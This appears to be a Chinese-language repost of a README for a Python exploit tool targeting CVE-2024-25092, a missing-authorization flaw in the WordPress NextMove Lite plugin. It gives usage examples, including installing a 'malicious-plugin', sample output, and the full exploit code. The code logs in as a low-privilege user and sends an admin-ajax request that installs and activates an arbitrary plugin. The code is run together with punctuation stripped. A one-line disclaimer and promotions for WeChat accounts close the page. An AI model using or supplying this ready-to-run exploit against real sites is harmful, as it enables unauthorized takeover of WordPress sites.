WordPress NextMove Lite 插件权限绕过漏洞利用工具 (CVE-2024-25092)

CVE-2024-25092 漏洞利用工具项目描述本项目是针对CVE-2024-25092漏洞的自动化利用脚本。该漏洞存在于 WordPress XLPlugins NextMove Lite 插件版本号 ≤ 2.17.0中由于缺少授权检查导致具有订阅者Subscriber及以上权限的认证用户可以绕过权限限制安装并激活任意 WordPress 插件。成功利用此漏洞可能导致网站完全被控制。属性值漏洞编号CVE-2024-25092公开日期2024-06-09严重程度高危 (CVSS 8.8)漏洞类型CWE-862 - 缺失授权受影响版本n/a 至 2.17.0CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H功能特性自动认证登录支持通过用户名和密码登录 WordPress 站点任意插件安装利用漏洞绕过授权限制安装并激活任意 WordPress 插件默认插件支持内置默认插件cart-for-woocommerce支持自定义插件名称会话管理使用requests.Session保持登录状态和 CookieSSL 警告抑制自动禁用不安全的 HTTPS 请求警告安装指南系统要求Python 3.xrequests库安装步骤将脚本保存为CVE-2024-25092.py安装依赖库pipinstallrequests使用说明命令行参数参数简写必填说明--url-u是目标 WordPress 站点 URL--username-un是WordPress 用户名--password-p是用户密码--plugin-pl否要安装的插件 slug默认cart-for-woocommerce基础使用示例# 使用默认插件python CVE-2024-25092.py-uhttp://example.com-unsubscriber_user-puser_password# 指定自定义插件python CVE-2024-25092.py-uhttps://target-site.com-uneditor-ppass123-plmalicious-plugin典型输出Logged in successfully. Site is vulnerable... Exploiting and uploading plugin Plugin cart-for-woocommerce installed and activated successfully.工作流程说明登录阶段向/wp-login.php发送 POST 请求验证用户凭证漏洞利用向/wp-admin/admin-ajax.php发送 POST 请求参数actionxl_addon_installation触发任意插件安装核心代码登录验证模块deflogin(session,url,username,password,user_agent):login_urlurl/wp-login.phpresponsesession.post(login_url,verifyFalse,data{log:username,pwd:password,rememberme:forever,wp-submit:LogIn},headers{User-Agent:user_agent})ifany(wordpress_logged_inincookie.nameforcookieinsession.cookies):print(Logged in successfully.)else:print(Failed to log in.)exit()漏洞版本检测defcheck_version(session,url,user_agent):responsesession.get(version_url,verifyFalse,headers{User-Agent:user_agent})ifresponse.status_code200:ifStable tag: 2.17.0inresponse.text:print(Site is vulnerable... Exploiting and uploading plugin)else:print(Site is not vulnerable.)exit()else:print(Failed to check version.)exit()插件安装利用模块definstall_plugin(session,url,plugin,user_agent):exploit_urlurl/wp-admin/admin-ajax.phpexploit_data{action:xl_addon_installation,xl_slug:plugin,xl_file:/plugin.php}headers{User-Agent:user_agent,Accept:*/*,Accept-Language:en-US,en;q0.5,Accept-Encoding:gzip, deflate, br,Referer:url/wp-admin/admin.php?pagexl-cart,Content-Type:application/x-www-form-urlencoded; charsetUTF-8,X-Requested-With:XMLHttpRequest,Origin:url,Connection:keep-alive,Cookie:; .join([f{cookie.name}{cookie.value}forcookieinsession.cookies])}responsesession.post(exploit_url,dataexploit_data,headersheaders,verifyFalse)ifresponse.status_code200:print(fPlugin {plugin} installed and activated successfully.)else:print(Failed to upload plugin.)主程序入口defmain():parserargparse.ArgumentParser(descriptionExploit script for CVE-2024-25092 By Nxploit Khaled Alenazi. )parser.add_argument(-u,--url,requiredTrue,helpTarget URL)parser.add_argument(-un,--username,requiredTrue,helpUsername)parser.add_argument(-p,--password,requiredTrue,helpPassword)parser.add_argument(-pl,--plugin,defaultcart-for-woocommerce,helpPlugin to install (default: cart-for-woocommerce))argsparser.parse_args()user_agentMozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0requests.packages.urllib3.disable_warnings()sessionrequests.Session()session.verifyFalselogin(session,args.url,args.username,args.password,user_agent)check_version(session,args.url,user_agent)install_plugin(session,args.url,args.plugin,user_agent)if__name____main__:main()免责声明本工具仅限用于授权的安全测试和教育目的。未经授权使用此脚本攻击系统属于违法行为。使用者需自行承担法律责任。6HFtX5dABrKlqXeO5PUv/36QVhA6BltxZzh7R/LTOFg更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享